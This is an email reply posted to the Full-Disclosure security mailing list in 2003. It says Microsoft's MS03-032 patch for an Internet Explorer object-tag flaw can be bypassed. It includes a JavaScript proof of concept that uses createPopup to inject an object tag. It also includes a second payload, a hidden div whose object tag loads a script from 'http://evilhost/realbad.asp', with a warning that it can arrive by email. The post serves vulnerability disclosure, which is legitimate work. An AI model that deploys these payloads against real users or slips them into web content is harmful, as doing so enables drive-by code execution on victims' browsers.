----- Original Message -----
From: "[email protected]" <[email protected]>
To: <[email protected]>
Sent: Sunday, September 07, 2003 6:17 AM
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
>
>
> Since the cat somehow got out of the bag, and more importantly, this
> is so blatantly obvious, herewith is the "Bad News":
>
> The patch for Drew's object data=funky.hta doesn't work:
>
> http://www.malware.com/badnews.html
>
> <script>
> var oPopup = window.createPopup();
>
> function showPopup() {
> oPopup.document.body.innerHTML = "<object data=ouch.php>";
> oPopup.show(0,0,1,1,document.body);
> }
>
> showPopup()
> </script>
this works tooβ¦
<div style="display.none"><object data="http://evilhost/realbad.asp">
</object>oh</div>
beware the mailβ¦
and the rewtXSS skillz
Donnie Werner
[email protected]
http://exploitlabs.com
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html